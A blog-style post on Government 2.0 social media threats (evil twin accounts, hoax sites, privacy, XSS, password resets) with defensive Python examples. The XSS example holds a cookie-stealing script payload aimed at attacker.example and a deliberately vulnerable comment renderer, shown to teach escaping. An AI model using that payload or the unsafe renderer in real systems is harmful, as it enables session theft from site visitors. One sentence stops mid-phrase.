So most of the security world is familiar with the Web 2.0 and Social Media threats in the private sector. Today we’re going to have an exposé on the threats specific to Government, because I don’t feel that they’ve been adequately represented in this whole push for Government 2.0 and transparency.
Threat: Evil Twin Agency Attack. A person registers on a social media site using the name of a Government entity. They then represent that entity to the public and say whatever it is that they want that agency to say.
What’s the Big Deal: For the most part there is no way to prove the authenticity of a Government entity on a social media site, short of a “catch us on <social media site>” tag on its .gov homepage. This isn’t an attack unique to Government, but the authority that people give to Government Internet presences means that the attacker inherits that perceived legitimacy.
Countermeasures: Monitoring by the agencies, looking for their official and unofficial presences on Social Media and Web 2.0 sites. Any new registration on a social media site is vetted for authenticity through the agency’s public affairs office. Agencies should have an official presence on social media sites to reserve their namespace, and should list those account names on their official website.
Threat: Web Hoax. A non-government person sets up their own social media or website and claims to be the Government.
What’s the Big Deal: This is similar to the evil twin attack, only on a different scale. For example, an entire social media site can be set up pretending to be a Government agency doing social networking, collecting data on citizens or asking citizens to do things on behalf of the Government. There is also a thin line between parody and
Countermeasures: Monitoring of URLs that claim to be Government-owned. This is easily done with some Google advanced operators and some RSS fun.
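Here is what that monitoring looks like once the “Google advanced operators and RSS fun” has produced a list of hits. This is an added example, not code from the original post: it builds the exclusion query for an agency name, then triages a constructed batch of search results (none of the hosts are real) into official, look-alike domain, impersonation, parody and plain mention. It also covers the evil twin accounts from the previous threat, since a fake account on a social media site shows up in the same feed as a fake site. The agency watch-list, the list of official suffixes and the result records are all assumptions.

```python
"""Triage search-result hits for evil twin accounts and hoax sites.

Added example, not part of the original post. Input is a constructed list of
search-result records of the shape a saved-search RSS feed yields; nothing
here touches the network.
"""
import re
from urllib.parse import urlparse

# Hypothetical watch-list that an agency's public affairs office maintains.
AGENCY_NAMES = ["Internal Revenue Service", "IRS"]

# Assumption: only Government can register under these suffixes.
OFFICIAL_SUFFIXES = ("gov", "mil", "fed.us")

PARODY_MARKERS = ("parody", "satire", "not affiliated", "unofficial")

# Constructed sample results; none of these hosts exist.
SAMPLE_RESULTS = [
    {"url": "https://www.irs.gov/newsroom", "title": "IRS Newsroom"},
    {"url": "http://irs-gov-refund.example.com/claim",
     "title": "Internal Revenue Service - Claim Your Refund"},
    {"url": "https://twitter.example.com/IRSnews_official",
     "title": "IRS official (@IRSnews_official)"},
    {"url": "http://blog.example.org/irs-parody",
     "title": "IRS (parody) - not affiliated"},
    {"url": "https://news.example.net/story",
     "title": "Senators question Internal Revenue Service budget"},
]


def build_query(name: str) -> str:
    """Google query for the agency name everywhere except its own namespace."""
    excludes = " ".join(f"-site:{s}" for s in OFFICIAL_SUFFIXES)
    return f'"{name}" {excludes}'


def is_official_host(host: str) -> bool:
    """True only when the host sits under an official suffix (label boundary respected)."""
    host = host.lower().rstrip(".")
    return any(host == s or host.endswith("." + s) for s in OFFICIAL_SUFFIXES)


def looks_like_gov_domain(host: str) -> bool:
    """Non-official host that smuggles 'gov' into a label, e.g. irs-gov-refund.example.com."""
    return re.search(r"(^|[^a-z])gov([^a-z]|$)", host.lower()) is not None


def _name_re(name: str) -> re.Pattern:
    return re.compile(r"\b" + re.escape(name) + r"\b", re.I)


def claims_identity(title: str) -> bool:
    """Title leads with the agency name, or pairs it with the word 'official'."""
    lower = title.lower()
    for name in AGENCY_NAMES:
        rx = _name_re(name)
        if rx.match(title) or (rx.search(title) and "official" in lower):
            return True
    return False


def mentions_agency(title: str) -> bool:
    return any(_name_re(n).search(title) for n in AGENCY_NAMES)


def classify(result: dict) -> str:
    """Verdict for one hit. Official hosts win outright; everything else is heuristic."""
    host = (urlparse(result["url"]).hostname or "").lower()
    title = result["title"]
    if is_official_host(host):
        return "official"
    if any(m in title.lower() for m in PARODY_MARKERS):
        return "parody"
    if looks_like_gov_domain(host):
        return "lookalike-domain"
    if claims_identity(title):
        return "impersonation"
    if mentions_agency(title):
        return "mention"
    return "unrelated"


def triage(results: list) -> dict:
    """Group URLs by verdict; lookalike/impersonation/parody go to public affairs for a look."""
    out: dict = {}
    for r in results:
        out.setdefault(classify(r), []).append(r["url"])
    return out


if __name__ == "__main__":
    print(build_query(AGENCY_NAMES[0]))
    for verdict, urls in triage(SAMPLE_RESULTS).items():
        print(f"{verdict:17s} {urls}")
```

The official-host check runs first on purpose: `www.irs.gov` would otherwise trip the look-alike regex. The title heuristics are deliberately loose; the point is to surface candidates for a human in public affairs, not to auto-block anything.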
Threat: Privacy Violations on Forums. A Government-operated social media site collects Personally Identifiable Information about visitors when they register to participate in forums, blog comments, etc.
What’s the Big Deal: If you’re a Government agency and you’re going to collect PII, you need to do a Privacy Impact Assessment, which is overkill if all you’re collecting is names and email addresses that could be false anyway. Worse, the PIA is a lengthy process and utterly destroys the quickness of web development as we know it.
Countermeasures: It has been proposed in some circles that Government social media sites use third-party ID providers such as OpenID to authenticate simple commenters and forum posters. This isn’t an original idea; Noel Dickover has been asking around about it for at least 9 months that I know of.
Threat: Monitoring v/s Law Enforcement v/s Intelligence Collection. The Government has to be careful about monitoring social media sites. Depending on which agency is doing it, at some point you collect enough information from enough sources that you’re now monitoring US persons.
What’s the Big Deal: If you’re collecting information and doing traffic analysis on people, you’re most likely running up against wiretap laws and/or FISA.
Countermeasures: Government needs Rules of Engagement for creating 2-way dialog with citizens complete with standards for the following practices:
- RSS feed aggregation for primary and secondary purposes
- RSS feed republishing
- Social networking monitoring for evil twin and hoax site attacks
- Typical “Web 2.0 Marketing” tactics such as group analysis
Threat: Hacked? Not Us! The Government does weird stuff with web sites. My web browser always carps at the government-issued SSL certificates because they use their own certificate authority.
What’s the Big Deal: Even though I know a Government site is legitimate, I still get the alert popups. Being hacked with XSS or another attack carries much more weight than it does for other sites, because people expect to get weird errors from Government sites and just click through. Also, the sheer volume of traffic on Government websites makes them a lucrative target if the attacker’s end goal is to infect desktops.
Countermeasures: The standard web server anti-XSS and other web application security stuff works here. Another happy thing would be to get the Federal CA certificate embedded in web browsers by default, like Thawte and VeriSign.
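For the “standard anti-XSS stuff” half of that countermeasure, here is an added example (mine, not from the original post) of the one place a Government 2.0 site is most likely to get it wrong: rendering a citizen’s comment back into the page. It puts the vulnerable renderer beside the hardened one, treats the commenter’s link as its own context (escaping alone does nothing against a `javascript:` URL), and lists the response headers that limit the blast radius if something still slips through. The template, the attacker payload and the header values are constructed for the example.

```python
"""Citizen comment rendering: stored XSS versus context-aware escaping.

Added example, not code from the original post. TEMPLATE, PAYLOAD and the
header set are constructed; the techniques are the usual ones.
"""
import html
from urllib.parse import urlparse

# Constructed page fragment a Government blog might use for a comment.
TEMPLATE = (
    '<div class="comment"><b>{author}</b> says: {body} '
    '<a href="{link}">site</a></div>'
)

# Constructed attacker input: on a high-traffic site this is the
# "infect desktops" payload the post worries about, here just a cookie grab.
PAYLOAD = "<script>new Image().src='http://attacker.example/?c='+document.cookie</script>"


def render_comment_unsafe(author: str, body: str, link: str) -> str:
    """Vulnerable on purpose: untrusted values dropped straight into HTML."""
    return TEMPLATE.format(author=author, body=body, link=link)


def safe_href(url: str):
    """Allow only absolute http/https links; javascript:, data: etc. are dropped.

    Returns the attribute-escaped URL, or None when the link is rejected.
    """
    candidate = url.strip()
    parsed = urlparse(candidate)  # urlparse lower-cases the scheme for us
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        return None
    return html.escape(candidate, quote=True)


def render_comment_safe(author: str, body: str, link: str) -> str:
    """Escape each value for the context it lands in: text, text, href attribute."""
    href = safe_href(link) or "#"
    return TEMPLATE.format(
        author=html.escape(author, quote=True),
        body=html.escape(body, quote=True),
        link=href,
    )


def security_headers() -> dict:
    """Response headers sent with the page; values are assumptions for the example."""
    return {
        # No inline script, no remote script, no plugins, no <base> hijack.
        "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                                   "object-src 'none'; base-uri 'none'",
        "X-Content-Type-Options": "nosniff",
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
    }


def contains_script(rendered: str) -> bool:
    """Crude check used to compare the two renderers."""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_comment_unsafe("citizen", PAYLOAD, "https://www.example.gov/"))
    print(render_comment_safe("citizen", PAYLOAD, "javascript:alert(1)"))
    for k, v in security_headers().items():
        print(f"{k}: {v}")
```

`html.escape` is right for HTML text and quoted attributes, and wrong for everything else (inline JavaScript, CSS, a URL’s scheme), which is why the link gets its own validator rather than another escape call.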
Threat: Oh Hai I Reset Your Password For You AKA “The Sarah Palin Attack”. The password reset functions in social media sites work fine if you’re not a public figure. Once the details of your life come under scrutiny, your pet’s name, mother’s maiden name, etc, all become public knowledge.
What’s the Big Deal: It depends on what kind of data you have in the social media site. This can range anywhere from the attacker getting lucky with one social media account to complete pwnage of your VIP’s online accounts.
Countermeasures: Engagement with the social media site to get special considerations for Government VIPs. Use of organizational accounts v/s personal accounts on social media sites. Information poisoning on password reset questions for VIPs–don’t put the real data up there. =)
Transparency in Action photo by Jeff Belmonte.